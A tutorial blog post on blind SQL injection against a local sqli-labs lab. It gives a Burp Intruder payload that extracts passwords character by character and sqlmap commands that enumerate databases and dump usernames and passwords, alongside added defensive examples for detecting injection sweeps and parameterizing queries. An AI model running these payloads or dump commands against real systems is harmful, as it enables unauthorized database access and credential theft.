[Running SQL blind injection with tools]
2022-07-03 04:38:00 【Black zone (rise)】
Contents
1. (Tool) Running blind injection with Burp
1.2 Method 2: brute-forcing with an injected statement
2. (Tool) Running Boolean blind injection with sqlmap
Step 1: detect whether there is an injection
Step 2: enumerate database names
Step 3: enumerate table names
1. (Tool) Running blind injection with Burp
1.1 Method 1: brute force
After capturing the request, send it to the "Intruder" module.
Set up 2 payloads.
1.2 Method 2: brute-forcing with an injected statement
Construct the injection statement and iterate over it:
(select case when '§0§' = lower(substring((select password from employees where empid=1),§1§,1)) then 1 else 0 end)
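From the defending side, the two iterated markers in that statement leave a recognizable trail: one client sending many requests that differ only in the guessed character and the substring position. The following is an added example, not code from the original post; the `id` parameter name, the IP addresses and the log entries are constructed.

```python
import re
from collections import defaultdict
from urllib.parse import quote_plus, unquote_plus

# Shape of the payload above: a one-character guess compared against
# substring(<subquery>, <position>, 1) inside CASE WHEN.
PROBE = re.compile(
    r"case\s+when\s+'(?P<guess>.)'\s*=\s*(?:lower\s*\(\s*)?substring\s*\("
    r".*?,\s*(?P<pos>\d+)\s*,\s*1\s*\)",
    re.IGNORECASE | re.DOTALL,
)

def find_blind_sweeps(records, min_requests=5):
    """records: iterable of (client_ip, raw_query_string) pairs.
    Returns clients that sent at least min_requests probes with varying guesses."""
    seen = defaultdict(lambda: {"requests": 0, "positions": set(), "guesses": set()})
    for client, query in records:
        match = PROBE.search(unquote_plus(query))
        if match is None:
            continue
        entry = seen[client]
        entry["requests"] += 1
        entry["positions"].add(int(match.group("pos")))
        entry["guesses"].add(match.group("guess").lower())
    return {
        client: {"requests": e["requests"],
                 "positions": sorted(e["positions"]),
                 "guesses": sorted(e["guesses"])}
        for client, e in seen.items()
        if e["requests"] >= min_requests and len(e["guesses"]) > 1
    }

def _sample_probe(guess, pos):
    # Constructed log entry: the page's statement with the two markers filled in,
    # URL-encoded into a hypothetical "id" parameter.
    sql = ("(select case when '%s' = lower(substring((select password from "
           "employees where empid=1),%d,1)) then 1 else 0 end)" % (guess, pos))
    return "id=" + quote_plus(sql)

# Constructed sample traffic (documentation IP ranges), not real logs.
SAMPLE = [("203.0.113.7", _sample_probe(g, p)) for p in (1, 2) for g in "abc"]
SAMPLE += [("198.51.100.20", "id=1"), ("198.51.100.20", "id=2&sort=name"),
           ("192.0.2.9", "q=sql+substring+function+examples")]

if __name__ == "__main__":
    for client, info in find_blind_sweeps(SAMPLE).items():
        print(client, info)
```

A request that merely mentions "substring" in a search term is not flagged, because the pattern requires the full character-comparison shape.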
2. (Tool) Running Boolean blind injection with sqlmap
2.1 Commands:
-u specifies the injection point
--dbs enumerates database names
--tables enumerates table names
--columns enumerates column names
--dump dumps the data
After each item has been enumerated, add in turn -D to specify the database, -T to specify the table, and -C to specify the columns.
2.2 Usage process:
Step 1: detect whether there is an injection
Basic operation
python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' --batch
--batch uses the default settings
The scan has in fact already identified the environment,
so you can add --dbms mysql
Step 2: enumerate database names
Command
# Get all databases
sqlmap.py -u url --dbs --batch
---------
# Get the current database
sqlmap.py -u url --current-db --batch
Basic operation
python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' --dbs --batch
Step 3: enumerate table names
Command
python sqlmap.py -u url -D DB --tables --batch
Basic operation
python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' -D security --tables --batch
Step 4: enumerate column names
Command:
sqlmap.py -u url -D DB -T TBL --columns --batch
Basic operation
python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' -D security -T users --columns --batch
Step 5: dump data
Command:
sqlmap.py -u url -D DB -T TBL -C "COL1,COL2" --dump --batch
Basic operation:
python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' -D security -T users -C "username,password" --dump --batch
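Every step above depends on the page answering differently when an injected condition is true than when it is false. The following added example (not code from the original post) shows that signal against a concatenated query and its absence once the value is validated and bound; it assumes a target that builds its query by string concatenation and shows only a found/not-found page, and the SQLite table, its row and the function names are constructed.

```python
import sqlite3

FOUND = "row found"   # constructed marker for the "true" page
EMPTY = ""            # the "false" page; SQL errors are hidden as well

def make_db():
    # Constructed stand-in for the lab's users table (in-memory SQLite, not MySQL).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'alice', 'constructed-secret')")
    return conn

def page_concatenated(conn, user_id):
    # Weak form: the parameter is pasted into the SQL text.
    sql = "SELECT username FROM users WHERE id='" + user_id + "' LIMIT 1"
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.Error:
        row = None
    return FOUND if row else EMPTY

def page_parameterized(conn, user_id):
    # Corrected form: validate the type, then bind the value as data.
    try:
        value = int(user_id)
    except ValueError:
        return EMPTY
    row = conn.execute("SELECT username FROM users WHERE id = ? LIMIT 1",
                       (value,)).fetchone()
    return FOUND if row else EMPTY

def has_boolean_oracle(page, conn):
    """True when an always-true and an always-false condition appended to the
    parameter produce different pages, the signal boolean-based testing relies on."""
    return page(conn, "1' AND '1'='1") != page(conn, "1' AND '1'='2")

if __name__ == "__main__":
    db = make_db()
    print("concatenated :", has_boolean_oracle(page_concatenated, db))
    print("parameterized:", has_boolean_oracle(page_parameterized, db))
```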
3. Recommended reading
[SQL injection - no echo] Boolean blind injection: principle, functions, usage process
[SQL injection - with echo] DNS request injection: principle, platform, usage process, configuration